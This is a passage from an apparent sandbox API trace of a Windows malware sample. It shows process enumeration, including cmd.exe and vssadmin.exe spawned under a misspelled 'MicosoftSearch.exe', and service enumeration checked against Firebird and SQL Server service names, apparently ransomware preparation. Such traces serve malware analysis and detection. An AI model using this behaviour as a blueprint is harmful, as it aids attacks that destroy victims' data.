th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0037.447] lstrlenW (lpString="twistedmonton.exe") returned 17 [0037.447] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0037.448] lstrlenW (lpString="arc plains.exe") returned 14 [0037.448] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0037.448] lstrlenW (lpString="americahousestip.exe") returned 20 [0037.448] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0037.449] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0037.449] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0037.450] lstrlenW (lpString="medical lectures.exe") returned 20 [0037.450] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0037.451] lstrlenW (lpString="electronic.exe") returned 14 [0037.451] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0037.451] lstrlenW (lpString="regression.exe") returned 14 [0037.451] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0037.452] lstrlenW (lpString="county.exe") returned 10 [0037.452] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.453] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0037.453] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.454] lstrlenW (lpString="dllhost.exe") returned 11 [0037.454] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.454] lstrlenW (lpString="dllhost.exe") returned 11 [0037.454] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0037.455] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0037.455] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.456] lstrlenW (lpString="cmd.exe") returned 7 [0037.456] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.456] lstrlenW (lpString="conhost.exe") returned 11 [0037.457] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0037.458] lstrlenW (lpString="vssadmin.exe") returned 12 [0037.458] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0037.458] lstrlenW (lpString="VSSVC.exe") returned 9 [0037.458] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0037.459] CloseHandle (hObject=0x1e4) returned 1 [0037.459] Sleep (dwMilliseconds=0x1f4) [0038.260] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232cc0 [0038.261] EnumServicesStatusExW (in: hSCManager=0x4232cc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0038.261] GetLastError () returned 0xea [0038.261] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x123e) returned 0xbc43e0 [0038.261] EnumServicesStatusExW (in: hSCManager=0x4232cc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc43e0, cbBufSize=0x123e, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc43e0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0038.262] CloseServiceHandle (hSCObject=0x4232cc0) returned 1 [0038.262] lstrlenW (lpString="Appinfo") returned 7 [0038.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0038.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0038.262] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0038.262] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0038.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0038.262] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0038.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.262] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0038.262] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0038.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0038.262] lstrlenW (lpString="AudioSrv") returned 8 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0038.263] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0038.263] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0038.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0038.263] lstrlenW (lpString="BFE") returned 3 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0038.263] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0038.263] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0038.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0038.263] lstrlenW (lpString="CryptSvc") returned 8 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0038.263] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0038.263] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0038.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0038.263] lstrlenW (lpString="CscService") returned 10 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0038.263] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0038.263] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0038.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0038.263] lstrlenW (lpString="DcomLaunch") returned 10 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.263] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0038.263] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0038.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0038.263] lstrlenW (lpString="Dhcp") returned 4 [0038.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0038.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0038.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0038.264] lstrlenW (lpString="Dnscache") returned 8 [0038.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0038.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0038.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0038.264] lstrlenW (lpString="DPS") returned 3 [0038.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0038.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0038.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0038.264] lstrlenW (lpString="eventlog") returned 8 [0038.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0038.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0038.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0038.264] lstrlenW (lpString="EventSystem") returned 11 [0038.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0038.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0038.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0038.264] lstrlenW (lpString="gpsvc") returned 5 [0038.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0038.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0038.264] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0038.264] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0038.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0038.265] lstrlenW (lpString="iphlpsvc") returned 8 [0038.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.265] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0038.265] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0038.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0038.265] lstrlenW (lpString="LanmanServer") returned 12 [0038.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0038.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0038.265] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0038.265] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0038.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0038.265] lstrlenW (lpString="LanmanWorkstation") returned 17 [0038.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.265] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0038.265] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0038.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0038.265] lstrlenW (lpString="lmhosts") returned 7 [0038.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0038.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0038.266] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0038.266] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0038.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0038.266] lstrlenW (lpString="MMCSS") returned 5 [0038.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0038.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0038.266] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0038.266] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0038.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0038.266] lstrlenW (lpString="MpsSvc") returned 6 [0038.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0038.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0038.266] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0038.266] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0038.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0038.266] lstrlenW (lpString="Netman") returned 6 [0038.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0038.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0038.266] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0038.266] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0038.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0038.266] lstrlenW (lpString="netprofm") returned 8 [0038.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0038.267] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0038.267] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0038.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0038.267] lstrlenW (lpString="NlaSvc") returned 6 [0038.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0038.267] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0038.267] lstrlenW (lpString="nsi") returned 3 [0038.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0038.267] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0038.267] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0038.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0038.267] lstrlenW (lpString="PcaSvc") returned 6 [0038.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0038.267] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0038.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0038.267] lstrlenW (lpString="PlugPlay") returned 8 [0038.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0038.267] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0038.267] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0038.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0038.267] lstrlenW (lpString="Power") returned 5 [0038.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0038.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0038.268] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0038.268] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0038.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0038.268] lstrlenW (lpString="ProfSvc") returned 7 [0038.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0038.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0038.268] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0038.268] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0038.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0038.268] lstrlenW (lpString="RpcEptMapper") returned 12 [0038.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.268] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0038.268] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0038.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0038.268] lstrlenW (lpString="RpcSs") returned 5 [0038.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0038.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0038.268] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0038.268] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0038.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0038.268] lstrlenW (lpString="SamSs") returned 5 [0038.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0038.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0038.268] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0038.268] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0038.269] lstrlenW (lpString="Schedule") returned 8 [0038.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0038.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0038.269] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0038.269] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0038.269] lstrlenW (lpString="SENS") returned 4 [0038.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0038.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0038.269] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0038.269] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0038.269] lstrlenW (lpString="ShellHWDetection") returned 16 [0038.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.269] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0038.269] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0038.269] lstrlenW (lpString="Spooler") returned 7 [0038.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0038.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0038.269] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0038.269] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0038.269] lstrlenW (lpString="SysMain") returned 7 [0038.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0038.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0038.269] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0038.269] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0038.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0038.269] lstrlenW (lpString="Themes") returned 6 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0038.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0038.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0038.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0038.270] lstrlenW (lpString="TrkWks") returned 6 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0038.270] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0038.270] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0038.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0038.270] lstrlenW (lpString="UxSms") returned 5 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0038.270] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0038.270] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0038.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0038.270] lstrlenW (lpString="VSS") returned 3 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0038.270] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0038.270] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0038.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0038.270] lstrlenW (lpString="WdiServiceHost") returned 14 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.270] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0038.270] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0038.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0038.270] lstrlenW (lpString="WdiSystemHost") returned 13 [0038.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0038.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0038.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0038.271] lstrlenW 